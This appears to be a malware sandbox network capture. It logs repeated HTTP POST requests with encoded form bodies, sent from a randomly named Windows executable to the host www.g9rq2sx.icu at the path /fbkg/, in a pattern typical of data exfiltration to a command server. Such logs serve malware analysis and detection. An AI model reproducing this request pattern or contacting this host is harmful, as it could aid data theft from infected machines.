                                                                                                                                                                                                Nov 17, 2023 19:27:21.341933966 CET506OUTData Raw: 4a 2b 6d 42 34 2f 66 74 4d 70 4f 5a 6a 74 44 62 78 36 50 41 53 46 63 72 42 47 2f 49 53 7a 43 57 55 76 43 42 62 65 71 32 79 42 4d 36 6a 61 4d 34 38 49 51 48 55 77 7a 70 37 57 6f 46 2f 66 33 72 2f 62 75 61 4d 50 33 71 66 69 50 34 5a 59 47 56 36 63
                                                                                                                                                                                                Data Ascii: J+mB4/ftMpOZjtDbx6PASFcrBG/ISzCWUvCBbeq2yBM6jaM48IQHUwzp7WoF/f3r/buaMP3qfiP4ZYGV6cqJS+O/D3sl9kJ1/nrOjY/QtgrpO+BJ7vYX10t6bpwgt227DBdP+phGBAelkcY79Qf0KHsf7112zZweOSRLfCCrGfkweVT9pJ7z/uuheeFysENQHmGkkxRXQeMOyDbG9wJO7jAroCa0j/d2CS+T7W5AxtrebRlXSFC
                                                                                                                                                                                                Nov 17, 2023 19:27:21.342120886 CET507OUTData Raw: 35 35 67 53 46 30 6f 58 38 42 45 5a 79 65 6a 30 66 76 68 62 42 72 34 6e 56 6e 51 42 43 31 6f 30 32 70 74 48 30 39 31 68 4a 73 6e 32 42 41 61 4e 63 52 50 42 57 7a 79 65 45 38 75 61 43 6a 2b 2f 5a 50 70 44 69 33 75 59 77 53 58 41 34 4f 66 53 57 58
                                                                                                                                                                                                Data Ascii: 55gSF0oX8BEZyej0fvhbBr4nVnQBC1o02ptH091hJsn2BAaNcRPBWzyeE8uaCj+/ZPpDi3uYwSXA4OfSWX0bpRhG/Cqd6FPz23r/T6JHO2cEm7W3J2cXI10+zBCsBNC+l5T0CVHauiWx4lzFXZTqGgUhh3M1l6+/yAVb1/XiEWQDi2bFPr5v6VLV3WxIL5PRPm9Bbv7bEN1FWP2DZ7tg9/kIaXNrydI96y3dJzeMqY6Zwseb+Nn
                                                                                                                                                                                                Nov 17, 2023 19:27:21.730333090 CET509OUTData Raw: 79 4c 79 6a 44 67 55 65 5a 64 55 6c 6c 39 6e 42 42 76 65 66 51 39 44 48 52 69 45 33 6b 47 70 52 64 4e 49 64 5a 56 65 2b 33 64 53 35 73 74 51 51 38 49 4c 46 45 77 4b 79 73 4e 34 31 4b 46 59 4f 6d 34 68 6b 7a 56 6a 73 74 59 41 32 6c 54 6d 71 2f 5a
                                                                                                                                                                                                Data Ascii: yLyjDgUeZdUll9nBBvefQ9DHRiE3kGpRdNIdZVe+3dS5stQQ8ILFEwKysN41KFYOm4hkzVjstYA2lTmq/ZsLkujZit9e8CYNM55GaGKaOBbTwlXGMXNLh83WhdEgHdUjfmJer20rVBf+OLOjJ/ZdHxsViRohP5Qu/SaVtaNxRllyXtRNC7AK/T3ddKLDP+0wHQDYhoRMn5NXQ9mzpj+0UcqDOBAmDfKuIWlChvtAmj+M7BdkEp+
                                                                                                                                                                                                Nov 17, 2023 19:27:22.881486893 CET510OUTData Raw: 69 55 68 56 50 42 75 70 6d 77 70 66 5a 41 49 75 69 49 30 65 6f 7a 45 30 42 4f 6e 54 74 53 44 67 4c 54 69 71 37 77 63 31 47 71 58 6f 6c 61 43 7a 53 6a 69 46 38 6f 35 53 2b 32 4c 55 71 69 79 39 74 65 33 6d 46 4e 69 79 79 4d 4a 57 62 34 71 36 30 4d
                                                                                                                                                                                                Data Ascii: iUhVPBupmwpfZAIuiI0eozE0BOnTtSDgLTiq7wc1GqXolaCzSjiF8o5S+2LUqiy9te3mFNiyyMJWb4q60Mjwe6hqiraqnSD2IxoTk0vpfLpMYw26iMXKNComkGjXm9xgXU9yyvo2HrDZ/MWbysJ2d9eYmjLVYoTN5JzLLUBbQMUzh/sHnbT5p4dzmTAad9Vmv/sE6tXDoEwVWnRjTL5nmLCAMUFeianLw+79+SDaqtZICVBLl6b
                                                                                                                                                                                                Nov 17, 2023 19:27:23.263884068 CET513OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:26.677519083 CET514OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:33.504590988 CET516OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883182049 CET518OUTData Raw: 67 4e 67 4a 72 54 5a 77 71 6e 48 4e 2b 45 73 72 4a 63 2f 6e 61 7a 57 63 52 59 44 6b 39 76 4b 30 5a 6f 79 66 43 66 66 63 42 69 52 4b 31 62 63 4f 2b 47 70 6a 74 71 50 36 37 2f 52 45 36 54 7a 4c 73 45 73 79 54 34 30 38 43 44 4b 39 30 54 6b 6b 48 66
                                                                                                                                                                                                Data Ascii: gNgJrTZwqnHN+EsrJc/nazWcRYDk9vK0ZoyfCffcBiRK1bcO+GpjtqP67/RE6TzLsEsyT408CDK90TkkHf53bJc8s+CWNIdffLA5xf+8GBbYU0igR8579TrQTmbOzHaQx+ykswaUJqfATlNp48AL7GePxcrd0MPxLNJdbCx3Ct7ZU4P9z8bB+xsBIqJ+YOKgUo9Rr0m/IJeaPRu4zjr5fCLDlwhFzJ0iYJ1sodllAv3jGTD0u+K
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883304119 CET520OUTData Raw: 66 55 59 56 47 33 33 6f 6c 39 46 4c 36 77 73 62 72 64 54 75 55 34 52 46 68 53 63 73 56 65 59 64 71 55 77 30 76 7a 52 51 6b 33 43 6a 4a 6a 67 7a 4e 4c 6f 6f 34 36 64 4a 56 58 31 6f 51 70 79 4b 4c 52 2f 59 49 66 45 69 37 63 6c 46 37 79 31 45 51 30
                                                                                                                                                                                                Data Ascii: fUYVG33ol9FL6wsbrdTuU4RFhScsVeYdqUw0vzRQk3CjJjgzNLoo46dJVX1oQpyKLR/YIfEi7clF7y1EQ0U/d3x/uq781cwxq/PEQQIAgylYbS9JC4Rc9eQh/NqftjnnVYY8DN/sKjDGzaGTH3yhqv4LkSX37MMb6z7ePdwFFg589RCgtRznbjnTp0kni64oAAmi20Xw8PkZABKyqkaJJh7hQQrcQgWxqweFzcIWXVRIv1b62Ch


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1738.163.97.880192.168.11.2050144C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:17.474773884 CET501OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79 78 76 33 59 4d 74 4c 48 37 65 44 72 35 4a 45 51 4c 50 31 39 36 63 31 55 4f 50 52 57 58 70 71 38 66 4d 57 61 58 38 4f 6a 33 51 33 6a 4c 73 5a 39 77 2f 66 6b 55 69 35 69 37 74 41 79 43 79 31 74 6d 53 51 6c 56 6d 67 33 35 70 77 55 5a 4d 33 6f 32 6f 31 6e 77 39 67 36 57 66 4c 7a 49 77 37 45 47 56 39 66 45 4d 67 52 65 51 61 30 36 78 55 30 4f 54 37 48 54 6c 33 6c 4d 78 68 53 41 53 64 78 77 39 58 72 55 6e 74 52 73 48 34 64 57 73 46 7a 57 33 69 76 4c 47 30 71 6a 38 67 79 71 48 73 41 30 48 6e 70 6e 4c 77 66 5a 34 65 76 38 4f 65 74 43 63 4e 47 6d 33 6a 45 37 36 59 55 46 50 43 6d 4b 66 2b 34 34 51 78 41 52 6e 6b 68 6a 59 41 46 48 39 6b 2f 31 63 61 39 43 61 79 67 55 4e 79 64 71 38 45 54 6b 37 47 55 79 57 47 4b 71 51 6b 61 68 4a 66 43 35 50 4b 4e 42 52 74 32 69 49 7a 52 4b 6b 76 5a 41 78 68 4c 6f 50 52 47 76 47 61 4b 74 6b 37 45 6c 6b 43 73 36 71 7a 4b 30 45 53 71 41 75 6a 5a 41 68 75 57 47 6d 64 42 6d 75 79 59 52 42 62 70 6d 79 38 5a 65 65 71 2b 65 58 56 72 59 37 66 32 62 2f 41 50 77 77 62 68 6a 72 59 71 75 34 33 4b 6f 67 70 49 55 44 35 42 65 61 4b 74 37 52 42 44 2b 66 58 75 62 4e 76 46 46 42 33 6b 65 39 53 72 59 38 37 48 46 75 69 75 42 78 46 6e 56 47 4a 36 44 57 37 6d 32 67 4b 76 58 50 54 4b 46 65 44 65 43 65 6d 63 4e 6c 54 38 74 56 66 30 58 53 72 6e 2f 70 57
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:27:18.866688967 CET502OUTData Raw: 53 49 4c 47 47 57 51 48 78 68 4e 59 51 4b 38 59 70 4d 73 6c 42 6f 4b 71 50 52 55 46 57 2f 74 76 33 4e 54 68 74 79 76 4e 57 6a 4c 7a 32 51 77 43 33 65 72 6e 4e 33 6e 6a 7a 4e 6f 56 2b 44 4a 6b 38 50 42 54 59 39 34 72 43 59 32 45 76 4b 34 4b 75 41
                                                                                                                                                                                                Data Ascii: SILGGWQHxhNYQK8YpMslBoKqPRUFW/tv3NThtyvNWjLz2QwC3ernN3njzNoV+DJk8PBTY94rCY2EvK4KuAga7p4jNIctYHI6Q4hVjmp8TNuaSQcpGffgy+Oa+hRz8fJBO7l+KPiTi/lMSjKV3fAJUzmhfGm1Zx+R5k3VGEAPo+qJtHGxm7/eMzVzPDtANiNpBIsnJ0SE+9FE/olE0YuihlhI1zY6T3rcpyw1Ewjq/P0IQ/peDwM
                                                                                                                                                                                                Nov 17, 2023 19:27:20.959978104 CET503OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65
